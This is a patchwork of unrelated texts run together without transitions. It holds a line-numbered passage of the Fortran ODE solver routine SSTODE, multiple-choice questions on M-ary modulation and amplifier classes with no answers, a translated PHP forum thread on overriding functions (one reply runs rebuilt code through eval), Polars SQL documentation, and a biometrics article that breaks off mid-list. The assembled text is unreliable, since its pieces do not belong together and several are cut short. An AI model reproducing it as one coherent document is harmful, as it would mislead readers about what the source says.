60 C -2 take the next step with a new value of H, 61 C but with other inputs unchanged. 62 C On return, JSTART is set to 1 to facilitate continuation. 63 C KFLAG = a completion code with the following meanings: 64 C 0 the step was succesful. 65 C -1 the requested error could not be achieved. 66 C -2 corrector convergence could not be achieved. 67 C -3 fatal error in PJAC or SLVS. 68 C A return with KFLAG = -1 or -2 means either 69 C abs(H) = HMIN or 10 consecutive failures occurred. 70 C On a return with KFLAG negative, the values of TN and 71 C the YH array are as of the beginning of the last 72 C step, and H is the last step size attempted. 73 C MAXORD = the maximum order of integration method to be allowed. 74 C MAXCOR = the maximum number of corrector iterations allowed. 75 C MSBP = maximum number of steps between PJAC calls (MITER .gt. 0). 76 C MXNCF = maximum number of convergence failures allowed. 77 C METH/MITER = the method flags. See description in driver. 78 C N = the number of first-order differential equations. 79 C The values of CCMAX, H, HMIN, HMXI, TN, JSTART, KFLAG, MAXORD, 80 C MAXCOR, MSBP, MXNCF, METH, MITER, and N are communicated via COMMON. 81 C 82 C***SEE ALSO SLSODE 83 C***ROUTINES CALLED SCFODE, SVNORM 84 C***COMMON BLOCKS SLS001 85 C***REVISION HISTORY (YYMMDD) 86 C 791129 DATE WRITTEN 87 C 890501 Modified prologue to SLATEC/LDOC format. (FNF) 88 C 890503 Minor cosmetic changes. (FNF) 89 C 930809 Renamed to allow single/double precision versions. (ACH) 90 C 010413 Reduced size of Common block /SLS001/. (ACH) 91 C 031105 Restored 'own' variables to Common block /SLS001/, to 92 C enable interrupt/restart feature. (ACH) 93 C***END PROLOGUE SSTODE 94 C**End 95  EXTERNAL f, jac, pjac, slvs 96  INTEGER NEQ, NYH, IWM 97  REAL Y, YH, YH1, EWT, SAVF, ACOR, WM 98  dimension neq(*), y(*), yh(nyh,*), yh1(*), ewt(*), savf(*), 99  1 acor(*), wm(*), iwm(*) 100  INTEGER INIT, MXSTEP, MXHNIL, NHNIL, NSLAST, CNYH, 101  1 ialth, ipup, lmax, meo, nqnyh, nslp, 102  1 icf, ierpj, iersl, jcur, jstart, kflag, l, 103  2 lyh, lewt, lacor, lsavf, lwm, liwm, meth, miter, 104  3 maxord, maxcor, msbp, mxncf, n, nq, nst, nfe, nje, nqu 105  INTEGER I, I1, IREDO, IRET, J, JB, M, NCF, NEWQ 106  REAL CONIT, CRATE, EL, ELCO, HOLD, RMAX, TESCO, 107  1 ccmax, el0, h, hmin, hmxi, hu, rc, tn, uround 108  REAL DCON, DDN, DEL, DELP, DSM, DUP, EXDN, EXSM, EXUP, 109  1 r, rh, rhdn, rhsm, rhup, told, svnorm 110  COMMON /sls001/ conit, crate, el(13), elco(13,12), 111  1 hold, rmax, tesco(3,12), 112  1 ccmax, el0, h, hmin, hmxi, hu, rc, tn, uround, 113  2 init, mxstep, mxhnil, nhnil, nslast, cnyh, 114  3 ialth, ipup, lmax, meo, nqnyh, nslp, 115  3 icf, ierpj, iersl, jcur, jstart, kflag, l, 116  4 lyh, lewt, lacor, lsavf, lwm, liwm, meth, miter, 117  5 maxord, maxcor, msbp, mxncf, n, nq, nst, nfe, nje, nqu 118 C 119 C***FIRST EXECUTABLE STATEMENT SSTODE 120  kflag = 0 121  told = tn 122  ncf = 0 123  ierpj = 0 124  iersl = 0 125  jcur = 0 126  icf = 0 127  delp = 0.0e0 128  IF (jstart .GT. 0) go to 200 129  IF (jstart .EQ. -1) go to 100 130  IF (jstart .EQ. -2) go to 160 131 C----------------------------------------------------------------------- 132 C On the first call, the order is set to 1, and other variables are 133 C initialized. RMAX is the maximum ratio by which H can be increased 134 C in a single step. It is initially 1.E4 to compensate for the small 135 C initial H, but then is normally equal to 10. 
If a failure 136 C occurs (in corrector convergence or error test), RMAX is set to 2 137 C for the next increase. 138 C----------------------------------------------------------------------- 139  lmax = maxord + 1 140  nq = 1 141  l = 2 142  ialth = 2 143  rmax = 10000.0e0 144  rc = 0.0e0 145  el0 = 1.0e0 146  crate = 0.7e0 147  hold = h 148  meo = meth 149  nslp = 0 150  ipup = miter 151  iret = 3 152  go to 140 153 C----------------------------------------------------------------------- 154 C The following block handles preliminaries needed when JSTART = -1. 155 C IPUP is set to MITER to force a matrix update. 156 C If an order increase is about to be considered (IALTH = 1), 157 C IALTH is reset to 2 to postpone consideration one more step. 158 C If the caller has changed METH, SCFODE is called to reset 159 C the coefficients of the method. 160 C If the caller has changed MAXORD to a value less than the current 161 C order NQ, NQ is reduced to MAXORD, and a new H chosen accordingly. 162 C If H is to be changed, YH must be rescaled. 163 C If H or METH is being changed, IALTH is reset to L = NQ + 1 164 C to prevent further changes in H for that many steps. 165 C----------------------------------------------------------------------- 166  100 ipup = miter 167  lmax = maxord + 1 168  IF (ialth .EQ. 1) ialth = 2 169  IF (meth .EQ. meo) go to 110 170  CALL scfode(meth, elco, tesco) 171  meo = meth 172  IF (nq .GT. maxord) go to 120 173  ialth = l 174  iret = 1 175  go to 150 176  110 IF (nq .LE. maxord) go to 160 177  120 nq = maxord 178  l = lmax 179  DO 125 i = 1,l 180  125 el(i) = elco(i,nq) 181  nqnyh = nq*nyh 182  rc = rc*el(1)/el0 183  el0 = el(1) 184  conit = 0.5e0/(nq+2) 185  ddn = svnorm(n, savf, ewt)/tesco(1,l) 186  exdn = 1.0e0/l 187  rhdn = 1.0e0/(1.3e0*ddn**exdn + 0.0000013e0) 188  rh = min(rhdn,1.0e0) 189  iredo = 3 190  IF (h .EQ. hold) go to 170 191  rh = min(rh,abs(h/hold)) 192  h = hold 193  go to 175 194 C----------------------------------------------------------------------- 195 C SCFODE is called to get all the integration coefficients for the 196 C current METH. Then the EL vector and related constants are reset 197 C whenever the order NQ is changed, or at the start of the problem. 198 C----------------------------------------------------------------------- 199  140 CALL scfode(meth, elco, tesco) 200  150 DO 155 i = 1,l 201  155 el(i) = elco(i,nq) 202  nqnyh = nq*nyh 203  rc = rc*el(1)/el0 204  el0 = el(1) 205  conit = 0.5e0/(nq+2) 206  go to(160, 170, 200), iret 207 C----------------------------------------------------------------------- 208 C If H is being changed, the H ratio RH is checked against 209 C RMAX, HMIN, and HMXI, and the YH array rescaled. IALTH is set to 210 C L = NQ + 1 to prevent a change of H for that many steps, unless 211 C forced by a convergence or error test failure. 212 C----------------------------------------------------------------------- 213  160 IF (h .EQ. hold) go to 200 214  rh = h/hold 215  h = hold 216  iredo = 3 217  go to 175 218  170 rh = max(rh,hmin/abs(h)) 219  175 rh = min(rh,rmax) 220  rh = rh/max(1.0e0,abs(h)*hmxi*rh) 221  r = 1.0e0 222  DO 180 j = 2,l 223  r = r*rh 224  DO 180 i = 1,n 225  180 yh(i,j) = yh(i,j)*r 226  h = h*rh 227  rc = rc*rh 228  ialth = l 229  IF (iredo .EQ. 0) go to 690 230 C----------------------------------------------------------------------- 231 C This section computes the predicted values by effectively 232 C multiplying the YH array by the Pascal Triangle matrix. 
233 C RC is the ratio of new to old values of the coefficient H*EL(1). 234 C When RC differs from 1 by more than CCMAX, IPUP is set to MITER 235 C to force PJAC to be called, if a Jacobian is involved. 236 C In any case, PJAC is called at least every MSBP steps. 237 C----------------------------------------------------------------------- 238  200 IF (abs(rc-1.0e0) .GT. ccmax) ipup = miter 239  IF (nst .GE. nslp+msbp) ipup = miter 240  tn = tn + h 241  i1 = nqnyh + 1 242  DO 215 jb = 1,nq 243  i1 = i1 - nyh 244 Cdir$ ivdep 245  DO 210 i = i1,nqnyh 246  210 yh1(i) = yh1(i) + yh1(i+nyh) 247  215 CONTINUE 248 C----------------------------------------------------------------------- 249 C Up to MAXCOR corrector iterations are taken. A convergence test is 250 C made on the R.M.S. norm of each correction, weighted by the error 251 C weight vector EWT. The sum of the corrections is accumulated in the 252 C vector ACOR(i). The YH array is not altered in the corrector loop. 253 C----------------------------------------------------------------------- 254  220 m = 0 255  DO 230 i = 1,n 256  230 y(i) = yh(i,1) 257  CALL f(neq, tn, y, savf) 258  nfe = nfe + 1 259  IF (ipup .LE. 0) go to 250 260 C----------------------------------------------------------------------- 261 C If indicated, the matrix P = I - h*el(1)*J is reevaluated and 262 C preprocessed before starting the corrector iteration. IPUP is set 263 C to 0 as an indicator that this has been done. 264 C----------------------------------------------------------------------- 265  CALL pjac(neq, y, yh, nyh, ewt, acor, savf, wm, iwm, f, jac) 266  ipup = 0 267  rc = 1.0e0 268  nslp = nst 269  crate = 0.7e0 270  IF (ierpj .NE. 0) go to 430 271  250 DO 260 i = 1,n 272  260 acor(i) = 0.0e0 273  270 IF (miter .NE. 0) go to 350 274 C----------------------------------------------------------------------- 275 C In the case of functional iteration, update Y directly from 276 C the result of the last function evaluation. 277 C----------------------------------------------------------------------- 278  DO 290 i = 1,n 279  savf(i) = h*savf(i) - yh(i,2) 280  290 y(i) = savf(i) - acor(i) 281  del = svnorm(n, y, ewt) 282  DO 300 i = 1,n 283  y(i) = yh(i,1) + el(1)*savf(i) 284  300 acor(i) = savf(i) 285  go to 400 286 C----------------------------------------------------------------------- 287 C In the case of the chord method, compute the corrector error, 288 C and solve the linear system with that as right-hand side and 289 C P as coefficient matrix. 290 C----------------------------------------------------------------------- 291  350 DO 360 i = 1,n 292  360 y(i) = h*savf(i) - (yh(i,2) + acor(i)) 293  CALL slvs(wm, iwm, y, savf) 294  IF (iersl .LT. 0) go to 430 295  IF (iersl .GT. 0) go to 410 296  del = svnorm(n, y, ewt) 297  DO 380 i = 1,n 298  acor(i) = acor(i) + y(i) 299  380 y(i) = yh(i,1) + el(1)*acor(i) 300 C----------------------------------------------------------------------- 301 C Test for convergence. If M.gt.0, an estimate of the convergence 302 C rate constant is stored in CRATE, and this is used in the test. 303 C----------------------------------------------------------------------- 304  400 IF (m .NE. 0) crate = max(0.2e0*crate,del/delp) 305  dcon = del*min(1.0e0,1.5e0*crate)/(tesco(2,nq)*conit) 306  IF (dcon .LE. 1.0e0) go to 450 307  m = m + 1 308  IF (m .EQ. maxcor) go to 410 309  IF (m .GE. 2 .AND. del .GT. 
2.0e0*delp) go to 410 310  delp = del 311  CALL f(neq, tn, y, savf) 312  nfe = nfe + 1 313  go to 270 314 C----------------------------------------------------------------------- 315 C The corrector iteration failed to converge. 316 C If MITER .ne. 0 and the Jacobian is out of date, PJAC is called for 317 C the next try. Otherwise the YH array is retracted to its values 318 C before prediction, and H is reduced, if possible. If H cannot be 319 C reduced or MXNCF failures have occurred, exit with KFLAG = -2. 320 C----------------------------------------------------------------------- 321  410 IF (miter .EQ. 0 .OR. jcur .EQ. 1) go to 430 322  icf = 1 323  ipup = miter 324  go to 220 325  430 icf = 2 326  ncf = ncf + 1 327  rmax = 2.0e0 328  tn = told 329  i1 = nqnyh + 1 330  DO 445 jb = 1,nq 331  i1 = i1 - nyh 332 Cdir$ ivdep 333  DO 440 i = i1,nqnyh 334  440 yh1(i) = yh1(i) - yh1(i+nyh) 335  445 CONTINUE 336  IF (ierpj .LT. 0 .OR. iersl .LT. 0) go to 680 337  IF (abs(h) .LE. hmin*1.00001e0) go to 670 338  IF (ncf .EQ. mxncf) go to 670 339  rh = 0.25e0 340  ipup = miter 341  iredo = 1 342  go to 170 343 C----------------------------------------------------------------------- 344 C The corrector has converged. JCUR is set to 0 345 C to signal that the Jacobian involved may need updating later. 346 C The local error test is made and control passes to statement 500 347 C if it fails. 348 C----------------------------------------------------------------------- 349  450 jcur = 0 350  IF (m .EQ. 0) dsm = del/tesco(2,nq) 351  IF (m .GT. 0) dsm = svnorm(n, acor, ewt)/tesco(2,nq) 352  IF (dsm .GT. 1.0e0) go to 500 353 C----------------------------------------------------------------------- 354 C After a successful step, update the YH array. 355 C Consider changing H if IALTH = 1. Otherwise decrease IALTH by 1. 356 C If IALTH is then 1 and NQ .lt. MAXORD, then ACOR is saved for 357 C use in a possible order increase on the next step. 358 C If a change in H is considered, an increase or decrease in order 359 C by one is considered also. A change in H is made only if it is by a 360 C factor of at least 1.1. If not, IALTH is set to 3 to prevent 361 C testing for that many steps. 362 C----------------------------------------------------------------------- 363  kflag = 0 364  iredo = 0 365  nst = nst + 1 366  hu = h 367  nqu = nq 368  DO 470 j = 1,l 369  DO 470 i = 1,n 370  470 yh(i,j) = yh(i,j) + el(j)*acor(i) 371  ialth = ialth - 1 372  IF (ialth .EQ. 0) go to 520 373  IF (ialth .GT. 1) go to 700 374  IF (l .EQ. lmax) go to 700 375  DO 490 i = 1,n 376  490 yh(i,lmax) = acor(i) 377  go to 700 378 C----------------------------------------------------------------------- 379 C The error test failed. KFLAG keeps track of multiple failures. 380 C Restore TN and the YH array to their previous values, and prepare 381 C to try the step again. Compute the optimum step size for this or 382 C one lower order. After 2 or more failures, H is forced to decrease 383 C by a factor of 0.2 or less. 384 C----------------------------------------------------------------------- 385  500 kflag = kflag - 1 386  tn = told 387  i1 = nqnyh + 1 388  DO 515 jb = 1,nq 389  i1 = i1 - nyh 390 Cdir$ ivdep 391  DO 510 i = i1,nqnyh 392  510 yh1(i) = yh1(i) - yh1(i+nyh) 393  515 CONTINUE 394  rmax = 2.0e0 395  IF (abs(h) .LE. hmin*1.00001e0) go to 660 396  IF (kflag .LE. 
-3) go to 640 397  iredo = 2 398  rhup = 0.0e0 399  go to 540 400 C----------------------------------------------------------------------- 401 C Regardless of the success or failure of the step, factors 402 C RHDN, RHSM, and RHUP are computed, by which H could be multiplied 403 C at order NQ - 1, order NQ, or order NQ + 1, respectively. 404 C In the case of failure, RHUP = 0.0 to avoid an order increase. 405 C The largest of these is determined and the new order chosen 406 C accordingly. If the order is to be increased, we compute one 407 C additional scaled derivative. 408 C----------------------------------------------------------------------- 409  520 rhup = 0.0e0 410  IF (l .EQ. lmax) go to 540 411  DO 530 i = 1,n 412  530 savf(i) = acor(i) - yh(i,lmax) 413  dup = svnorm(n, savf, ewt)/tesco(3,nq) 414  exup = 1.0e0/(l+1) 415  rhup = 1.0e0/(1.4e0*dup**exup + 0.0000014e0) 416  540 exsm = 1.0e0/l 417  rhsm = 1.0e0/(1.2e0*dsm**exsm + 0.0000012e0) 418  rhdn = 0.0e0 419  IF (nq .EQ. 1) go to 560 420  ddn = svnorm(n, yh(1,l), ewt)/tesco(1,nq) 421  exdn = 1.0e0/nq 422  rhdn = 1.0e0/(1.3e0*ddn**exdn + 0.0000013e0) 423  560 IF (rhsm .GE. rhup) go to 570 424  IF (rhup .GT. rhdn) go to 590 425  go to 580 426  570 IF (rhsm .LT. rhdn) go to 580 427  newq = nq 428  rh = rhsm 429  go to 620 430  580 newq = nq - 1 431  rh = rhdn 432  IF (kflag .LT. 0 .AND. rh .GT. 1.0e0) rh = 1.0e0 433  go to 620 434  590 newq = l 435  rh = rhup 436  IF (rh .LT. 1.1e0) go to 610 437  r = el(l)/l 438  DO 600 i = 1,n 439  600 yh(i,newq+1) = acor(i)*r 440  go to 630 441  610 ialth = 3 442  go to 700 443  620 IF ((kflag .EQ. 0) .AND. (rh .LT. 1.1e0)) go to 610 444  IF (kflag .LE. -2) rh = min(rh,0.2e0) 445 C----------------------------------------------------------------------- 446 C If there is a change of order, reset NQ, l, and the coefficients. 447 C In any case H is reset according to RH and the YH array is rescaled. 448 C Then exit from 690 if the step was OK, or redo the step otherwise. 449 C----------------------------------------------------------------------- 450  IF (newq .EQ. nq) go to 170 451  630 nq = newq 452  l = nq + 1 453  iret = 2 454  go to 150 455 C----------------------------------------------------------------------- 456 C Control reaches this section if 3 or more failures have occurred. 457 C If 10 failures have occurred, exit with KFLAG = -1. 458 C It is assumed that the derivatives that have accumulated in the 459 C YH array have errors of the wrong order. Hence the first 460 C derivative is recomputed, and the order is set to 1. Then 461 C H is reduced by a factor of 10, and the step is retried, 462 C until it succeeds or H reaches HMIN. 463 C----------------------------------------------------------------------- 464  640 IF (kflag .EQ. -10) go to 660 465  rh = 0.1e0 466  rh = max(hmin/abs(h),rh) 467  h = h*rh 468  DO 645 i = 1,n 469  645 y(i) = yh(i,1) 470  CALL f(neq, tn, y, savf) 471  nfe = nfe + 1 472  DO 650 i = 1,n 473  650 yh(i,2) = h*savf(i) 474  ipup = miter 475  ialth = 5 476  IF (nq .EQ. 1) go to 200 477  nq = 1 478  l = 2 479  iret = 3 480  go to 150 481 C----------------------------------------------------------------------- 482 C All returns are made through this section. H is saved in HOLD 483 C to allow the caller to change H on the next step. 
484 C-----------------------------------------------------------------------
 485  660 kflag = -1
 486  go to 720
 487  670 kflag = -2
 488  go to 720
 489  680 kflag = -3
 490  go to 720
 491  690 rmax = 10.0e0
 492  700 r = 1.0e0/tesco(2,nqu)
 493  DO 710 i = 1,n
 494  710 acor(i) = acor(i)*r
 495  720 hold = h
 496  jstart = 1
 497  RETURN
 498 C----------------------- END OF SUBROUTINE SSTODE ----------------------
 499  END
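Two pieces of the error control above are easy to miss in the dense listing: the weighted norm used for all the error tests (the SVNORM calls; its definition lives in a separate file and is assumed here to be the usual ODEPACK weighted root-mean-square norm over the EWT weights described in the prologue), and the candidate step-size ratios RHDN/RHSM/RHUP computed around statements 520-560. A small Python/NumPy sketch of both, transcribed from the expressions in the listing:

import numpy as np

def weighted_rms_norm(v, ewt):
    # Assumed SVNORM: each component of v is scaled by its error weight,
    # then a root-mean-square average is taken over the components.
    v = np.asarray(v, dtype=float)
    ewt = np.asarray(ewt, dtype=float)
    return float(np.sqrt(np.mean((v * ewt) ** 2)))

def step_size_factors(dsm, dup, ddn, nq):
    # Candidate ratios by which H could be multiplied at the current order nq
    # (rhsm), at nq + 1 (rhup) and at nq - 1 (rhdn), mirroring statements
    # 520-560 above; the tiny constants guard against division by zero, and
    # no order decrease is considered when nq is already 1.
    l = nq + 1
    rhsm = 1.0 / (1.2 * dsm ** (1.0 / l) + 1.2e-6)
    rhup = 1.0 / (1.4 * dup ** (1.0 / (l + 1)) + 1.4e-6)
    rhdn = 1.0 / (1.3 * ddn ** (1.0 / nq) + 1.3e-6) if nq > 1 else 0.0
    return rhdn, rhsm, rhup

# Example: a scaled error estimate below 1 leaves the step nearly unchanged,
# while an estimate well above 1 would force a reduction.
print(step_size_factors(dsm=0.5, dup=0.4, ddn=0.6, nq=3))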
M-ary Modulation

This set of Digital Communications Multiple Choice Questions & Answers (MCQs) focuses on "M-ary modulation and amplifiers".

1. In M-ary FSK, as M increases the probability of error
a) Increases
b) Decreases
c) Is not affected
d) Cannot be determined

2. In M-ary FSK, as M tends to infinity the probability of error tends to
a) Infinity
b) Unity
c) Zero
d) None of the mentioned

3. For non-coherent reception of PSK, _____ is used.
a) Differential encoding
b) Decoding
c) Differential encoding & decoding
d) None of the mentioned

4. Which modulation technique has the same bit and symbol error probability?
a) BPSK
b) DPSK
c) OOK
d) All of the mentioned

5. An amplifier uses ______ to take the input signal.
a) DC power
b) AC power
c) DC & AC power
d) None of the mentioned

6. Which has 50% maximum power efficiency?
a) Class A
b) Class B
c) Class AB
d) None of the mentioned

7. Which generates high distortion?
a) Class A
b) Class B
c) Class C
d) Class AB

8. Class B linear amplifiers have a maximum power efficiency of
a) 50%
b) 75%
c) 78.5%
d) None of the mentioned

9. Which has the maximum power efficiency?
a) Class A
b) Class B
c) Class C
d) Class AB

10. Free space is an idealization which consists of
a) Transmitter
b) Receiver
c) Transmitter & Receiver
d) None of the mentioned
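For readers who want to sanity-check a couple of the figures behind these questions, here is a small, purely illustrative Python sketch: it prints the ideal Class B efficiency limit of pi/4 (the 78.5% figure in question 8) and shows how the union bound on symbol error for coherent orthogonal M-ary FSK falls as M grows at a fixed Eb/N0 (the behaviour behind questions 1 and 2); the Eb/N0 value used is arbitrary.

import math

# Ideal maximum efficiency of a Class B push-pull stage is pi/4.
print(f"Class B maximum efficiency: {math.pi / 4:.1%}")

def q_func(x):
    # Gaussian tail probability Q(x).
    return 0.5 * math.erfc(x / math.sqrt(2.0))

eb_n0 = 4.0  # hypothetical Eb/N0 (about 6 dB), chosen only for illustration
for m in (2, 4, 16, 64):
    k = math.log2(m)
    union_bound = (m - 1) * q_func(math.sqrt(k * eb_n0))
    print(f"M = {m:3d}: symbol-error union bound ~ {union_bound:.2e}")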
How to override a function in another PHP file from a custom function library

lxf, 2024-04-03 22:06:02

To avoid editing the program's system files (so that my changes are not wiped out by a later upgrade), I want to create my own function-library file, extention.php, and include it while the system runs. That way I can override system functions inside extention.php and also add my own functions there.

For example, suppose there are three PHP files:

a.php -- the system function library, which must not be modified
extention.php -- my own function library, which I can add to and change freely
result.php -- the file that calls the library functions

a.php

function show()
{
    $str = 'this is a';
    return $str;
}

extention.php -- here I also define a show() function, hoping to override the show() in a.php

function show()
{
    $str = 'this is my extention a';
    return $str;
}

result.php -- includes the two files above and calls show()

include 'a.php';
include 'extention.php';
$result = show();
echo $result;

Visiting result.php reports a "Cannot redeclare" error.

Material I found online suggests namespaces, but that does not seem to give the effect I want. I would like to leave the system library (the a.php above) completely untouched and change only my own extention.php, and still be able to alter the behaviour of the functions in a.php. Is that possible?

Replies (solutions)

Reply 1: Extend the system library and define a method with the same name:

class extention extends a {
    function show()
    {
        $str = 'this is my extention a';
        return $str;
    }
}

Reply 2: Two choices: 1. namespaces; 2. modify the target function directly -- surely your a.php is not entirely off-limits?

Reply 3: I suggest using PHP namespaces to call functions that share a name. For example:

test/b.php

namespace testb;
function test()
{
    return 'b.php';
}

test/c.php

namespace testc;
function test()
{
    return 'c.php';
}

test/a.php calls them:

include('b.php');
include('c.php');
echo \testb\test();
echo \testc\test();

Reply 4: No, what you have in mind cannot be done in PHP, because PHP does not allow a function to be redeclared. The namespaces mentioned above can ease the conflict, but they do not fit your scenario, because you do not intend to modify the original system code, and the calls to these functions are issued by the original system. When I design system functions that are meant to be overridable, I use the following scheme.

The system function is defined as:

<?php
function show() {
    if (function_exists('ext_show')) {
        ext_show();
        return;
    }
    echo 'abc';
}

and the "overriding" function is:

<?php
function ext_show()
{
    echo 'ext_abc';
}

That still differs from your current requirement, so we can consider pre-processing a.php with a small program first. Here is simple test code for that approach:

a.php

<?php
function show() {
    echo 'a.php';
}
function get() {
    echo 'a.php->get';
}

extention.php

<?php
function show() {
    echo 'extention.php';
}

result.php

<?php
include 'extention.php';
//include 'a.php';
$a = file_get_contents('a.php');
$a = str_replace(array('<?php', '?>'), '', $a);
$a = str_replace(array("\r\n", "\r", "\n"), '', $a);
$a = str_replace('function ', PHP_EOL.'function ', $a);
$a_fun = explode(PHP_EOL, $a);
$new_a = '';
foreach($a_fun as $fun) {
    if (preg_match('|function\s(.*?)\(|i', $fun, $match)) {
        $fun_name = trim($match[1]);
        if (!function_exists($fun_name)) {
            $new_a .= $fun.PHP_EOL;
        }
    }
}
eval($new_a);
show();

This can be optimised further: first check whether a file a.runtime.php exists; if it does not, run the processing above, write $new_a to a.runtime.php, and then include that file.
Skip to content SELECT In Polars SQL, the SELECT statement is used to retrieve data from a table into a DataFrame. The basic syntax of a SELECT statement in Polars SQL is as follows: SELECT column1, column2, ... FROM table_name; Here, column1, column2, etc. are the columns that you want to select from the table. You can also use the wildcard * to select all columns. table_name is the name of the table or that you want to retrieve data from. In the sections below we will cover some of the more common SELECT variants register · execute df = pl.DataFrame( { "city": [ "New York", "Los Angeles", "Chicago", "Houston", "Phoenix", "Amsterdam", ], "country": ["USA", "USA", "USA", "USA", "USA", "Netherlands"], "population": [8399000, 3997000, 2705000, 2320000, 1680000, 900000], } ) ctx = pl.SQLContext(population=df, eager_execution=True) print(ctx.execute("SELECT * FROM population")) shape: (6, 3) ┌─────────────┬─────────────┬────────────┐ │ city ┆ country ┆ population │ │ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 │ ╞═════════════╪═════════════╪════════════╡ │ New York ┆ USA ┆ 8399000 │ │ Los Angeles ┆ USA ┆ 3997000 │ │ Chicago ┆ USA ┆ 2705000 │ │ Houston ┆ USA ┆ 2320000 │ │ Phoenix ┆ USA ┆ 1680000 │ │ Amsterdam ┆ Netherlands ┆ 900000 │ └─────────────┴─────────────┴────────────┘ GROUP BY The GROUP BY statement is used to group rows in a table by one or more columns and compute aggregate functions on each group. execute result = ctx.execute( """ SELECT country, AVG(population) as avg_population FROM population GROUP BY country """ ) print(result) shape: (2, 2) ┌─────────────┬────────────────┐ │ country ┆ avg_population │ │ --- ┆ --- │ │ str ┆ f64 │ ╞═════════════╪════════════════╡ │ Netherlands ┆ 900000.0 │ │ USA ┆ 3.8202e6 │ └─────────────┴────────────────┘ ORDER BY The ORDER BY statement is used to sort the result set of a query by one or more columns in ascending or descending order. execute result = ctx.execute( """ SELECT city, population FROM population ORDER BY population """ ) print(result) shape: (6, 2) ┌─────────────┬────────────┐ │ city ┆ population │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═════════════╪════════════╡ │ Amsterdam ┆ 900000 │ │ Phoenix ┆ 1680000 │ │ Houston ┆ 2320000 │ │ Chicago ┆ 2705000 │ │ Los Angeles ┆ 3997000 │ │ New York ┆ 8399000 │ └─────────────┴────────────┘ JOIN register_many · execute income = pl.DataFrame( { "city": [ "New York", "Los Angeles", "Chicago", "Houston", "Amsterdam", "Rotterdam", "Utrecht", ], "country": [ "USA", "USA", "USA", "USA", "Netherlands", "Netherlands", "Netherlands", ], "income": [55000, 62000, 48000, 52000, 42000, 38000, 41000], } ) ctx.register_many(income=income) result = ctx.execute( """ SELECT country, city, income, population FROM population LEFT JOIN income on population.city = income.city """ ) print(result) shape: (6, 4) ┌─────────────┬─────────────┬────────┬────────────┐ │ country ┆ city ┆ income ┆ population │ │ --- ┆ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 ┆ i64 │ ╞═════════════╪═════════════╪════════╪════════════╡ │ USA ┆ New York ┆ 55000 ┆ 8399000 │ │ USA ┆ Los Angeles ┆ 62000 ┆ 3997000 │ │ USA ┆ Chicago ┆ 48000 ┆ 2705000 │ │ USA ┆ Houston ┆ 52000 ┆ 2320000 │ │ USA ┆ Phoenix ┆ null ┆ 1680000 │ │ Netherlands ┆ Amsterdam ┆ 42000 ┆ 900000 │ └─────────────┴─────────────┴────────┴────────────┘ Functions Polars provides a wide range of SQL functions, including: • Mathematical functions: ABS, EXP, LOG, ASIN, ACOS, ATAN, etc. • String functions: LOWER, UPPER, LTRIM, RTRIM, STARTS_WITH,ENDS_WITH. 
• Aggregation functions: SUM, AVG, MIN, MAX, COUNT, STDDEV, FIRST etc. • Array functions: EXPLODE, UNNEST,ARRAY_SUM,ARRAY_REVERSE, etc. For a full list of supported functions go the API documentation. The example below demonstrates how to use a function in a query query result = ctx.execute( """ SELECT city, population FROM population WHERE STARTS_WITH(country,'U') """ ) print(result) shape: (5, 2) ┌─────────────┬────────────┐ │ city ┆ population │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═════════════╪════════════╡ │ New York ┆ 8399000 │ │ Los Angeles ┆ 3997000 │ │ Chicago ┆ 2705000 │ │ Houston ┆ 2320000 │ │ Phoenix ┆ 1680000 │ └─────────────┴────────────┘ Table Functions In the examples earlier we first generated a DataFrame which we registered in the SQLContext. Polars also support directly reading from CSV, Parquet, JSON and IPC in your SQL query using table functions read_xxx. execute result = ctx.execute( """ SELECT * FROM read_csv('docs/src/data/iris.csv') """ ) print(result) shape: (150, 5) ┌──────────────┬─────────────┬──────────────┬─────────────┬───────────┐ │ sepal_length ┆ sepal_width ┆ petal_length ┆ petal_width ┆ species │ │ --- ┆ --- ┆ --- ┆ --- ┆ --- │ │ f64 ┆ f64 ┆ f64 ┆ f64 ┆ str │ ╞══════════════╪═════════════╪══════════════╪═════════════╪═══════════╡ │ 5.1 ┆ 3.5 ┆ 1.4 ┆ 0.2 ┆ Setosa │ │ 4.9 ┆ 3.0 ┆ 1.4 ┆ 0.2 ┆ Setosa │ │ 4.7 ┆ 3.2 ┆ 1.3 ┆ 0.2 ┆ Setosa │ │ 4.6 ┆ 3.1 ┆ 1.5 ┆ 0.2 ┆ Setosa │ │ … ┆ … ┆ … ┆ … ┆ … │ │ 6.3 ┆ 2.5 ┆ 5.0 ┆ 1.9 ┆ Virginica │ │ 6.5 ┆ 3.0 ┆ 5.2 ┆ 2.0 ┆ Virginica │ │ 6.2 ┆ 3.4 ┆ 5.4 ┆ 2.3 ┆ Virginica │ │ 5.9 ┆ 3.0 ┆ 5.1 ┆ 1.8 ┆ Virginica │ └──────────────┴─────────────┴──────────────┴─────────────┴───────────┘
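The table functions compose naturally with the aggregate functions listed earlier. As a small illustrative sketch, reusing the documented SQLContext and read_csv pattern, and assuming the same iris.csv path and the column names shown in the output above:

import polars as pl

ctx = pl.SQLContext(eager_execution=True)
result = ctx.execute(
    """
    SELECT species, AVG(sepal_length) AS avg_sepal_length, MAX(petal_width) AS max_petal_width
    FROM read_csv('docs/src/data/iris.csv')
    GROUP BY species
    ORDER BY species
    """
)
print(result)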
Biometrics

Written by: Ethel Macasias

Biometrics is primarily used for identification and verification purposes. Biometric recognition is the study of methods for uniquely recognizing a person based on one or more physical or behavioural characteristics. Biometric recognition is being used in conjunction with various forms of technology for authentication purposes. Some of these technologies include smart cards, magnetic stripe cards and physical keys.

Biometric Methods

There are two types of biometrics, physical and behavioural. Behavioural biometrics is usually used for verification, and physical biometrics is usually used for determining or verifying one's identity. Various methods of biometrics stem from both the physical and behavioural biometric types. Some of these biometric recognition methods are mentioned below.

Iris
Iris patterns are randomly formed, so even a person's left and right eyes are different. Scanning of the iris is used to measure the iris pattern in the coloured part of the eye. The iris is very distinctive and robust, which provides quick results for both identification and verification purposes.

Retinal
The measuring of blood vessel patterns at the back of the eye is known as retinal scanning. However, retinal scanning is not yet widely used because some people find this biometric system disturbing, since it requires the person to stand very still while a light source is shined into their eye.

Facial
The recording of the spatial geometry of facial features is used for facial recognition. Since a person's face can be captured from a distance by a camera, many casinos, stores and urban areas use facial recognition to identify potential criminals.

Voice
